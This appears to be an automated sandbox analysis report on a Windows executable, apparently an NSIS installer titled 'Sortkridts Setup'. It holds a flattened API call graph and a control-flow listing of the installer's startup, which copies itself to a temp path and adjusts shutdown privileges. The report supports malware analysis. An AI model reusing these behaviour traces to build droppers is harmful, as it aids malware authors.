6fc32211 4637->4642 4638 6fc322b7 lstrcpynW 4638->4642 4639 6fc322a6 StringFromGUID2 4639->4642 4640 6fc322ca wsprintfW 4640->4642 4641 6fc322ee GlobalFree 4641->4642 4642->4637 4642->4638 4642->4639 4642->4640 4642->4641 4643 6fc32325 GlobalFree 4642->4643 4644 6fc315eb 2 API calls 4642->4644 4689 6fc31638 4642->4689 4643->4556 4644->4642 4693 6fc312f8 GlobalAlloc 4646->4693 4648 6fc3166d 4649 6fc31f1e 2 API calls 4648->4649 4650 6fc31677 4649->4650 4651 6fc315eb 4650->4651 4652 6fc31633 GlobalFree 4651->4652 4653 6fc315f4 GlobalAlloc lstrcpynW 4651->4653 4652->4561 4653->4652 4655 6fc31f2b wsprintfW 4654->4655 4656 6fc31f5c lstrcpyW 4654->4656 4658 6fc31765 4655->4658 4656->4658 4658->4565 4660 6fc317a4 4659->4660 4661 6fc3201c 4659->4661 4660->4573 4660->4575 4661->4660 4662 6fc32033 GlobalFree 4661->4662 4662->4661 4664 6fc315eb 2 API calls 4663->4664 4665 6fc315e6 4664->4665 4665->4567 4666->4578 4667->4601 4668->4601 4676 6fc312f8 GlobalAlloc 4669->4676 4671 6fc312f0 lstrcpynW 4671->4601 4673 6fc31327 4672->4673 4673->4605 4674->4595 4675->4598 4676->4671 4678 6fc31555 4677->4678 4679 6fc312f8 GlobalAlloc 4677->4679 4680 6fc312e1 2 API calls 4678->4680 4679->4608 4681 6fc3156a 4680->4681 4681->4608 4683 6fc319ea VirtualAlloc 4682->4683 4684 6fc31a48 4682->4684 4683->4684 4684->4615 4686 6fc32cd8 4685->4686 4687 6fc32ccd GetLastError 4685->4687 4686->4563 4687->4686 4688->4642 4690 6fc31663 4689->4690 4691 6fc3163f 4689->4691 4690->4642 4691->4690 4692 6fc31648 lstrcpyW 4691->4692 4692->4690 4693->4648 5204 4043f9 GetDlgItem GetDlgItem 5205 40444d 7 API calls 5204->5205 5210 404673 5204->5210 5206 4044f0 DeleteObject 5205->5206 5207 4044e3 SendMessageW 5205->5207 5209 4044ff 5206->5209 5207->5206 5208 4047aa 5211 404884 5208->5211 5212 4047ef 5208->5212 5216 405e95 17 API calls 5209->5216 5217 40453d 5209->5217 5210->5208 5236 404705 5210->5236 5258 4056b5 SendMessageW 5210->5258 5214 404893 SendMessageW 5211->5214 5215 4048af 5211->5215 5213 4048d9 5212->5213 5219 40480e SendMessageW 5212->5219 5221 405736 8 API calls 5213->5221 5214->5213 5222 4048b9 5215->5222 5234 4048ef 5215->5234 5224 404515 SendMessageW SendMessageW 5216->5224 5218 4054f5 18 API calls 5217->5218 5225 404555 5218->5225 5219->5213 5227 40482b SendMessageW 5219->5227 5220 404792 SendMessageW 5220->5208 5228 404b01 5221->5228 5229 4048c2 ImageList_Destroy 5222->5229 5230 4048c9 5222->5230 5224->5209 5231 4054f5 18 API calls 5225->5231 5226 404ab8 5226->5213 5235 404acf ShowWindow GetDlgItem ShowWindow 5226->5235 5232 404844 5227->5232 5229->5230 5230->5213 5233 4048d2 GlobalFree 5230->5233 5244 404561 5231->5244 5239 40485a SendMessageW 5232->5239 5233->5213 5234->5226 5252 404926 5234->5252 5263 405491 5234->5263 5235->5213 5236->5208 5236->5220 5237 404640 GetWindowLongW SetWindowLongW 5238 404656 5237->5238 5240 40466d 5238->5240 5241 40465d ShowWindow 5238->5241 5239->5234 5257 4054de SendMessageW 5240->5257 5241->5240 5243 4045b9 SendMessageW 5243->5244 5244->5237 5244->5243 5246 4045f5 SendMessageW 5244->5246 5247 404608 SendMessageW 5244->5247 5248 40463c 5244->5248 5246->5244 5247->5244 5248->5237 5248->5238 5249 404a6e 5250 404a8a InvalidateRect 5249->5250 5254 404a99 5249->5254 5250->5254 5251 404964 SendMessageW 5253 40497e 5251->5253 5252->5251 5252->5253 5253->5249 5256 404a14 SendMessageW SendMessageW 5253->5256 5254->5226 5255 40553b 20 API calls 5254->5255 5255->5226 5256->5253 5257->5210 5259 405714 SendMessageW 5258->5259 5260 4056d6 GetMessagePos ScreenToClient SendMessageW 5258->5260 5262 40570c 5259->5262 5261 405711 5260->5261 5260->5262 5261->5259 5262->5236 5272 406af5 lstrcpynW 5263->5272 5265 4054a4 5273 4065fa wsprintfW 5265->5273 5267 4054ae 5268 401533 94 API calls 5267->5268 5269 4054b7 5268->5269 5274 406af5 lstrcpynW 5269->5274 5271 4054be 5271->5252 5272->5265 5273->5267 5274->5271 5275 402e7c SendMessageW 5276 402e94 InvalidateRect 5275->5276 5277 402ea1 5275->5277 5276->5277 4764 4025ff 4765 402608 4764->4765 4766 40262f 4764->4766 4768 4030c1 17 API calls 4765->4768 4767 40303e 17 API calls 4766->4767 4769 402636 4767->4769 4770 40260f 4768->4770 4776 40307c 4769->4776 4772 402615 4770->4772 4775 402648 4770->4775 4773 40303e 17 API calls 4772->4773 4774 40261c RegDeleteValueW RegCloseKey 4773->4774 4774->4775 4777 403089 4776->4777 4778 403090 4776->4778 4777->4775 4778->4777 4780 40141e 4778->4780 4781 4062b3 RegOpenKeyExW 4780->4781 4782 40145b 4781->4782 4783 401463 4782->4783 4784 401527 4782->4784 4785 40146f RegEnumValueW 4783->4785 4794 401493 4783->4794 4784->4777 4786 401503 RegCloseKey 4785->4786 4785->4794 4786->4784 4787 4014ce RegEnumKeyW 4788 4014d8 RegCloseKey 4787->4788 4787->4794 4789 4068c1 5 API calls 4788->4789 4791 4014e9 4789->4791 4790 40141e 6 API calls 4790->4794 4792 401514 4791->4792 4793 4014ed RegDeleteKeyW 4791->4793 4792->4784 4793->4784 4794->4786 4794->4787 4794->4788 4794->4790 5278 401000 5279 401039 BeginPaint GetClientRect 5278->5279 5280 40100a DefWindowProcW 5278->5280 5282 40110f 5279->5282 5283 40119a 5280->5283 5284 401117 5282->5284 5285 40107e CreateBrushIndirect FillRect DeleteObject 5282->5285 5286 401185 EndPaint 5284->5286 5287 40111d CreateFontIndirectW 5284->5287 5285->5282 5286->5283 5287->5286 5288 401130 6 API calls 5287->5288 5288->5286 3813 401d01 3814 401d5d 3813->3814 3815 401d0f 3813->3815 3816 401d67 3814->3816 3817 401d8c GlobalAlloc 3814->3817 3818 401d50 3815->3818 3822 401d1e 3815->3822 3823 401709 3816->3823 3850 406af5 lstrcpynW 3816->3850 3830 405e95 3817->3830 3819 405e95 17 API calls 3818->3819 3819->3814 3847 406af5 lstrcpynW 3822->3847 3824 401d79 GlobalFree 3824->3823 3826 401d2d 3848 406af5 lstrcpynW 3826->3848 3828 401d3c 3849 406af5 lstrcpynW 3828->3849 3844 405ea0 3830->3844 3831 4060ee 3831->3823 3832 4060d9 3832->3831 3858 406af5 lstrcpynW 3832->3858 3834 4060a4 lstrlenW 3834->3844 3835 405fb9 GetSystemDirectoryW 3835->3844 3837 405e95 10 API calls 3837->3834 3838 405fcc GetWindowsDirectoryW 3838->3844 3841 405ff9 SHGetSpecialFolderLocation 3843 406011 SHGetPathFromIDListW CoTaskMemFree 3841->3843 3841->3844 3842 405e95 10 API calls 3842->3844 3843->3844 3844->3832 3844->3834 3844->3835 3844->3837 3844->3838 3844->3841 3844->3842 3845 406045 lstrcatW 3844->3845 3846 406d18 CharNextW CharNextW CharNextW CharNextW CharPrevW 3844->3846 3851 406952 3844->3851 3856 4065fa wsprintfW 3844->3856 3857 406af5 lstrcpynW 3844->3857 3845->3844 3846->3844 3847->3826 3848->3828 3849->3823 3850->3824 3859 4062b3 3851->3859 3854 4069b8 3854->3844 3855 406987 RegQueryValueExW RegCloseKey 3855->3854 3856->3844 3857->3844 3858->3831 3860 4062c2 3859->3860 3861 4062c6 3860->3861 3862 4062cb RegOpenKeyExW 3860->3862 3861->3854 3861->3855 3862->3861 5289 401b03 5290 403002 17 API calls 5289->5290 5291 401b0a 5290->5291 5292 403002 17 API calls 5291->5292 5293 401b15 5292->5293 5294 40303e 17 API calls 5293->5294 5295 401b20 lstrlenW 5294->5295 5296 401b3c 5295->5296 5298 401b67 5295->5298 5296->5298 5301 406af5 lstrcpynW 5296->5301 5299 401b5b 5299->5298 5300 401b5f lstrlenW 5299->5300 5300->5298 5301->5299 5302 6fc31000 5303 6fc3101b 5 API calls 5302->5303 5304 6fc31019 5303->5304 5305 401c04 5306 403002 17 API calls 5305->5306 5307 401c0e 5306->5307 5308 403002 17 API calls 5307->5308 5309 401bb2 5308->5309 5310 401b88 5311 40303e 17 API calls 5310->5311 5312 401b8f 5311->5312 5313 40303e 17 API calls 5312->5313 5314 401b98 5313->5314 5315 401ba0 lstrcmpiW 5314->5315 5316 401ba8 lstrcmpW 5314->5316 5317 401bae 5315->5317 5316->5317 5318 6fc31b0a 5319 6fc31b38 5318->5319 5320 6fc32351 21 API calls 5319->5320 5321 6fc31b3f 5320->5321 5322 6fc31b52 5321->5322 5323 6fc31b46 5321->5323 5325 6fc31b73 5322->5325 5326 6fc31b5c 5322->5326 5324 6fc315eb 2 API calls 5323->5324 5329 6fc31b50 5324->5329 5327 6fc31b79 5325->5327 5328 6fc31b9f 5325->5328 5330 6fc315c5 3 API calls 5326->5330 5331 6fc31668 3 API calls 5327->5331 5332 6fc315c5 3 API calls 5328->5332 5333 6fc31b61 5330->5333 5334 6fc31b7e 5331->5334 5332->5329 5335 6fc31668 3 API calls 5333->5335 5336 6fc315eb 2 API calls 5334->5336 5337 6fc31b67 5335->5337 5339 6fc31b84 GlobalFree 5336->5339 5338 6fc315eb 2 API calls 5337->5338 5340 6fc31b6d GlobalFree 5338->5340 5339->5329 5339->5340 5342 404b0b 5343 404cb4 5342->5343 5344 404b28 GetDlgItem GetDlgItem GetDlgItem 5342->5344 5346 404d00 5343->5346 5347 404cbc GetDlgItem CreateThread CloseHandle 5343->5347 5387 4054de SendMessageW 5344->5387 5349 404d31 5346->5349 5350 404d08 5346->5350 5364 404ce8 5347->5364 5348 404ba1 5354 404ba8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5348->5354 5353 404d39 5349->5353 5356 404d7f 5349->5356 5352 404d14 ShowWindow ShowWindow 5350->5352 5350->5364 5351 405736 8 API calls 5355 404cf6 5351->5355 5389 4054de SendMessageW 5352->5389 5358 404d42 5353->5358 5359 404d55 ShowWindow 5353->5359 5361 404bf8 SendMessageW SendMessageW 5354->5361 5362 404c0c 5354->5362 5363 404d92 SendMessageW 5356->5363 5356->5364 5369 405933 SendMessageW 5358->5369 5359->5358 5360 404d6c 5359->5360 5365 405d15 24 API calls 5360->5365 5361->5362 5366 404c14 SendMessageW 5362->5366 5367 404c1e 5362->5367 5363->5355 5368 404db0 CreatePopupMenu 5363->5368 5364->5351 5365->5358 5366->5367 5370 4054f5 18 API calls 5367->5370 5371 405e95 17 API calls 5368->5371 5369->5364 5372 404c30 5370->5372 5373 404dc2 AppendMenuW 5371->5373 5374 404c39 ShowWindow 5372->5374 5375 404c6b GetDlgItem SendMessageW 5372->5375 5376 404de4 GetWindowRect 5373->5376 5377 404df8 TrackPopupMenu 5373->5377 5379 404c5a 5374->5379 5380 404c4f ShowWindow 5374->5380 5375->5355 5378 404c97 SendMessageW SendMessageW 5375->5378 5376->5377 5377->5355 5381 404e1a 5377->5381 5378->5355 5388 4054de SendMessageW 5379->5388 5380->5379 5382 404e2e SendMessageW 5381->5382 5382->5382 5384 404e4a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5382->5384 5385 404e76 SendMessageW 5384->5385 5385->5385 5386 404ea4 GlobalUnlock SetClipboardData CloseClipboard 5385->5386 5386->5355 5387->5348 5388->5375 5389->5364 5390 401e8e 5391 403002 17 API calls 5390->5391 5392 401e94 IsWindow 5391->5392 5393 401bb2 5392->5393 5394 404f0e 5395 404f32 5394->5395 5396 404f1a 5394->5396 5398 404f66 5395->5398 5399 404f38 SHGetPathFromIDListW 5395->5399 5404 406a15 GetDlgItemTextW 5396->5404 5400 404f48 5399->5400 5403 404f27 SendMessageW 5399->5403 5402 401533 94 API calls 5400->5402 5402->5403 5403->5398 5404->5403 4694 40211b 4695 40303e 17 API calls 4694->4695 4696 402121 4695->4696 4697 405d15 24 API calls 4696->4697 4698 40212b 4697->4698 4699 4066b1 2 API calls 4698->4699 4700 402131 4699->4700 4701 40215b 4700->4701 4705 401709 4700->4705 4707 4064ef WaitForSingleObject 4700->4707 4703 402110 CloseHandle 4701->4703 4701->4705 4703->4705 4704 40214b 4704->4701 4712 4065fa wsprintfW 4704->4712 4708 406506 4707->4708 4709 40651c GetExitCodeProcess 4708->4709 4710 4061ea 2 API calls 4708->4710 4709->4704 4711 40650d WaitForSingleObject 4710->4711 4711->4708 4712->4701 4740 40291d 4741 403002 17 API calls 4740->4741 4748 40292e 4741->4748 4742 402aa2 SetFilePointer 4743 402aee 4745 402980 ReadFile 4745->4742 4745->4748 4746 406923 ReadFile 4746->4748 4747 402a3d 4747->4742 4747->4748 4754 40645f SetFilePointer 4747->4754 4748->4742 4748->4743 4748->4745 4748->4746 4748->4747 4749 402ae4 4748->4749 4750 4029c5 MultiByteToWideChar 4748->4750 4753 4029f6 SetFilePointer MultiByteToWideChar 4748->4753 4763 4065fa wsprintfW 4749->4763 4750->4748 4753->4748 4755 40647b 4754->4755 4756 406496 4754->4756 4757 406923 ReadFile 4755->4757 4756->4747 4758 406487 4757->4758 4758->4756 4759 4064c7 SetFilePointer 4758->4759 4760 40649f SetFilePointer 4758->4760 4759->4756 4760->4759 4761 4064aa 4760->4761 4762 4069e6 WriteFile 4761->4762 4762->4756 4763->4743 5405 40219d 5406 40303e 17 API calls 5405->5406 5407 4021a4 5406->5407 5408 4068c1 5 API calls 5407->5408 5409 4021b5 5408->5409 5410 4021ce GlobalAlloc 5409->5410 5413 402ea5 5409->5413 5411 4021e3 5410->5411 5410->5413 5412 4068c1 5 API calls 5411->5412 5414 4021ea 5412->5414 5415 4068c1 5 API calls 5414->5415 5417 4021f3 5415->5417 5416 40224e GlobalFree 5416->5413 5417->5416 5422 4065fa wsprintfW 5417->5422 5419 402237 5423 4065fa wsprintfW 5419->5423 5421 40224c 5421->5416 5422->5419 5423->5421 5424 401aa1 5425 401aa2 5424->5425 5426 40303e 17 API calls 5425->5426 5427 401aa7 5426->5427 5428 4066f4 66 API calls 5427->5428 5429 401ab1 5428->5429 5430 403d23 5431 403d2e 5430->5431 5432 403d32 5431->5432 5433 403d35 GlobalAlloc 5431->5433 5433->5432 5434 402ba3 5435 40303e 17 API calls 5434->5435 5436 402bb2 5435->5436 5437 402bc9 5436->5437 5438 40303e 17 API calls 5436->5438 5439 406b78 2 API calls 5437->5439 5438->5437 5440 402bcf 5439->5440 5462 4068f6 GetFileAttributesW CreateFileW 5440->5462 5442 402bdc 5443 402cb7 5442->5443 5446 402c9f 5442->5446 5447 402bfd GlobalAlloc 5442->5447 5444 402cc0 DeleteFileW 5443->5444 5445 402ccf 5443->5445 5444->5445 5449 403148 35 API calls 5446->5449 5447->5446 5448 402c1d 5447->5448 5463 403131 SetFilePointer 5448->5463 5451 402cac CloseHandle 5449->5451 5451->5443 5452 402c23 5453 40311b ReadFile 5452->5453 5454 402c2d GlobalAlloc 5453->5454 5455 402c43 5454->5455 5456 402c84 5454->5456 5457 403148 35 API calls 5455->5457 5458 4069e6 WriteFile 5456->5458 5461 402c52 5457->5461 5459 402c93 GlobalFree 5458->5459 5459->5446 5460 402c7a GlobalFree 5460->5456 5461->5460 5462->5442 5463->5452 5464 6fc31aa7 5465 6fc3156c GlobalFree 5464->5465 5467 6fc31abf 5465->5467 5466 6fc31b01 GlobalFree 5467->5466 5468 6fc31add 5467->5468 5469 6fc31aed VirtualFree 5467->5469 5468->5466 5469->5466 3874 402728 3885 4030c1 3874->3885 3879 402748 RegQueryValueExW 3881 40276b 3879->3881 3884 402772 3879->3884 3880 401709 3881->3884 3895 4065fa wsprintfW 3881->3895 3882 40271c RegCloseKey 3882->3880 3884->3880 3884->3882 3886 40303e 17 API calls 3885->3886 3887 4030d9 3886->3887 3888 4062b3 RegOpenKeyExW 3887->3888 3889 402732 3888->3889 3890 40303e 3889->3890 3891 405e95 17 API calls 3890->3891 3892 403067 3891->3892 3893 40273b 3892->3893 3896 406d18 3892->3896 3893->3879 3893->3880 3895->3884 3902 406d2d 3896->3902 3897 406daf 3898 406db7 CharPrevW 3897->3898 3900 406dd7 3897->3900 3898->3897 3899 406da0 CharNextW 3899->3897 3899->3902 3900->3893 3902->3897 3902->3899 3903 406d8c CharNextW 3902->3903 3904 406d9b CharNextW 3902->3904 3905 4065d1 3902->3905 3903->3902 3904->3899 3906 4065f7 3905->3906 3907 4065dd 3905->3907 3906->3902 3907->3906 3908 4065e6 CharNextW 3907->3908 3908->3906 3908->3907 5470 402b28 5471 402b2e 5470->5471 5472 402b36 FindClose 5471->5472 5473 402ea1 5471->5473 5472->5473 5474 40362a 5475 403650 5474->5475 5476 40363c SetTimer 5474->5476 5477 403659 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5475->5477 5478 4036a7 5475->5478 5476->5477 5477->5478 5479 4058ab 5480 4058c0 5479->5480 5481 4058d4 5479->5481 5483 4058c6 5480->5483 5484 405919 CallWindowProcW 5480->5484 5482 4058dc IsWindowVisible 5481->5482 5489 4058f3 5481->5489 5482->5484 5485 4058e9 5482->5485 5487 4054c3 SendMessageW 5483->5487 5486 4058d0 5484->5486 5488 4056b5 5 API calls 5485->5488 5487->5486 5488->5489 5489->5484 5490 405491 94 API calls 5489->5490 5490->5484 5491 4025ac 5492 40303e 17 API calls 5491->5492 5493 4025bd 5492->5493 5494 40303e 17 API calls 5493->5494 5495 4025c6 5494->5495 5496 40303e 17 API calls 5495->5496 5497 4025cf GetPrivateProfileStringW 5496->5497 5498 4025f4 5497->5498 5499 401ead 5500 403002 17 API calls 5499->5500 5501 401eb4 5500->5501 5502 403002 17 API calls 5501->5502 5503 401ebd GetDlgItem 5502->5503 3912 4027b0 3913 4030c1 17 API calls 3912->3913 3914 4027ba 3913->3914 3915 403002 17 API calls 3914->3915 3916 4027c3 3915->3916 3917 4027d5 3916->3917 3921 401709 3916->3921 3918 4027f0 RegEnumValueW 3917->3918 3919 4027e4 RegEnumKeyW 3917->3919 3920 40280e RegCloseKey 3918->3920 3919->3920 3920->3921 5504 405630 lstrcpynW lstrlenW 5505 401ab6 5506 40303e 17 API calls 5505->5506 5507 401abd 5506->5507 5508 406a83 MessageBoxIndirectW 5507->5508 5509 401709 5508->5509 5510 402837 5511 40303e 17 API calls 5510->5511 5514 401afd 5511->5514 5513 402855 5514->5510 5514->5513 5515 4068f6 GetFileAttributesW CreateFileW 5514->5515 5515->5514 5516 401fb8 GetDC 5517 403002 17 API calls 5516->5517 5518 401fc8 GetDeviceCaps MulDiv ReleaseDC 5517->5518 5519 403002 17 API calls 5518->5519 5520 401ff8 5519->5520 5521 405e95 17 API calls 5520->5521 5522 402032 CreateFontIndirectW 5521->5522 5523 6fc3103a 5525 6fc31052 5523->5525 5524 6fc310c5 5525->5524 5526 6fc31081 5525->5526 5527 6fc31061 5525->5527 5529 6fc3156c GlobalFree 5526->5529 5528 6fc3156c GlobalFree 5527->5528 5530 6fc31072 5528->5530 5533 6fc31079 5529->5533 5531 6fc3156c GlobalFree 5530->5531 5531->5533 5532 6fc31091 GlobalSize 5534 6fc3109a 5532->5534 5533->5532 5533->5534 5535 6fc310af 5534->5535 5536 6fc3109e GlobalAlloc 5534->5536 5538 6fc310b8 GlobalFree 5535->5538 5537 6fc315c5 3 API calls 5536->5537 5537->5535 5538->5524 5539 401dba 5540 403002 17 API calls 5539->5540 5541 401dc1 5540->5541 5542 403002 17 API calls 5541->5542 5543 401dce 5542->5543 5544 40303e 17 API calls 5543->5544 5547 401de1 5543->5547 5544->5547 5545 401e50 5550 40303e 17 API calls 5545->5550 5546 401e01 5549 403002 17 API calls 5546->5549 5548 40303e 17 API calls 5547->5548 5551 401df6 5547->5551 5548->5551 5552 401e06 5549->5552 5553 401e55 5550->5553 5551->5545 5551->5546 5554 403002 17 API calls 5552->5554 5555 40303e 17 API calls 5553->5555 5556 401e11 5554->5556 5557 401e5e FindWindowExW 5555->5557 5558 401e41 SendMessageW 5556->5558 5559 401e1e SendMessageTimeoutW 5556->5559 5560 401e7b 5557->5560 5558->5560 5559->5560 5561 401bbb 5562 40303e 17 API calls 5561->5562 5563 401bc4 ExpandEnvironmentStringsW 5562->5563 5564 401bd7 5563->5564 5565 401be9 5563->5565 5564->5565 5566 401bdd lstrcmpW 5564->5566 5566->5565 5567 6fc32ebf 5568 6fc32ed7 5567->5568 5569 6fc31309 2 API calls 5568->5569 5570 6fc32ef2 5569->5570

                                Executed Functions

                                Function 004036D7 Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416stringfilecomCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 4036d7-403720 SetErrorMode GetVersionExW 1 403722-403742 GetVersionExW 0->1 2 403759 0->2 4 403744-403748 1->4 5 403755-403757 1->5 3 403760-403765 2->3 7 403772 3->7 8 403767-403770 3->8 6 40374b-403753 4->6 5->6 6->3 9 403776-4037b8 7->9 8->9 10 4037ba-4037c2 call 4068c1 9->10 11 4037cb 9->11 10->11 16 4037c4 10->16 13 4037d0-4037e2 call 406179 lstrlenA 11->13 18 4037e4-403800 call 4068c1 * 3 13->18 16->11 25 403811-4038aa #17 OleInitialize SHGetFileInfoW call 406af5 GetCommandLineW call 406af5 call 4065d1 CharNextW 18->25 26 403802-403808 18->26 35 4038b0 25->35 36 403985-40399f GetTempPathW call 403c80 25->36 26->25 30 40380a 26->30 30->25 37 4038b2-4038b8 35->37 44 4039a1-4039bf GetWindowsDirectoryW lstrcatW call 403c80 36->44 45 4039f7-403a10 DeleteFileW call 4033c8 36->45 39 4038c5-4038d0 37->39 40 4038ba-4038c3 37->40 42 4038d2-4038d9 39->42 43 4038db-4038ea 39->43 40->39 40->40 42->43 47 403945-403959 call 4065d1 43->47 48 4038ec-4038f8 43->48 44->45 62 4039c1-4039f1 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c80 44->62 56 403bc1 45->56 57 403a16-403a1c 45->57 65 403961-403967 47->65 66 40395b-40395e 47->66 52 403912-403918 48->52 53 4038fa-403901 48->53 60 403934-40393b 52->60 61 40391a-403921 52->61 58 403903-403906 53->58 59 403908 53->59 69 403bc5-403bd2 call 4036ad OleUninitialize 56->69 67 403a81-403a88 call 405a19 57->67 68 403a1e-403a30 call 4065d1 57->68 58->52 58->59 59->52 60->47 63 40393d-403943 60->63 61->60 70 403923-40392a 61->70 62->45 79 403bbf 62->79 63->47 71 403971-403980 call 406af5 63->71 65->36 73 403969-40396c 65->73 66->65 81 403a8d-403a8f 67->81 84 403a46-403a48 68->84 85 403bd4-403bdf call 406a83 69->85 86 403be7-403bee 69->86 77 403931 70->77 78 40392c-40392f 70->78 71->36 73->37 77->60 78->60 78->77 79->56 81->69 90 403a32-403a38 84->90 91 403a4a-403a51 84->91 92 403be1 ExitProcess 85->92 88 403bf0-403c06 GetCurrentProcess OpenProcessToken 86->88 89 403c6c-403c7b 86->89 94 403c08-403c36 LookupPrivilegeValueW AdjustTokenPrivileges 88->94 95 403c3c-403c4a call 4068c1 88->95 89->92 96 403a43 90->96 97 403a3a-403a41 90->97 98 403a53-403a63 call 406613 91->98 99 403a94-403aac call 4064d7 lstrcatW 91->99 94->95 108 403c58-403c63 ExitWindowsEx 95->108 109 403c4c-403c56 95->109 96->84 97->91 97->96 106 403a69-403a7f call 406af5 * 2 98->106 107 403bbb-403bbd 98->107 110 403abd-403ade lstrcatW lstrcmpiW 99->110 111 403aae-403ab8 lstrcatW 99->111 106->67 107->69 108->89 113 403c65-403c67 call 401533 108->113 109->108 109->113 110->107 114 403ae4-403aeb 110->114 111->110 113->89 118 403af4 call 405df9 114->118 119 403aed-403af2 call 405e19 114->119 124 403af9-403b0b SetCurrentDirectoryW 118->124 119->124 126 403b1c-403b36 call 406af5 124->126 127 403b0d-403b17 call 406af5 124->127 131 403b37-403b55 call 405e95 DeleteFileW 126->131 127->126 134 403ba4-403bae 131->134 135 403b57-403b6b CopyFileW 131->135 134->131 136 403bb0-403bb6 call 406218 134->136 135->134 137 403b6d-403b99 call 406218 call 405e95 call 4066b1 135->137 136->107 137->134 145 403b9b-403ba2 CloseHandle 137->145 145->134
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                                • GetVersionExW.KERNEL32 ref: 0040371C
                                • GetVersionExW.KERNEL32(?), ref: 0040372F
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                • OleInitialize.OLE32(00000000), ref: 00403818
                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                • GetCommandLineW.KERNEL32(Sortkridts Setup,NSIS Error), ref: 0040384C
                                • CharNextW.USER32(00000000,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000), ref: 00403898
                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403996
                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039A7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B3
                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039CF
                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E0
                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                • DeleteFileW.KERNELBASE(1033), ref: 00403A02
                                  • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                  • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\temp_executable.exe,00000400,?,?,?,?,?), ref: 004033F7
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AA5
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AB8
                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AC7
                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000,00000000), ref: 00403AD6
                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AFE
                                • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\temp_executable.exe,004209C0,00000001), ref: 00403B63
                                • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                  • Part of subcall function 00405DF9: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00405E01
                                  • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                • ExitProcess.KERNEL32 ref: 00403BE1
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                  • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,?,"C:\Users\user\AppData\Local\Temp\temp_executable.exe" ,00000000), ref: 004065E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
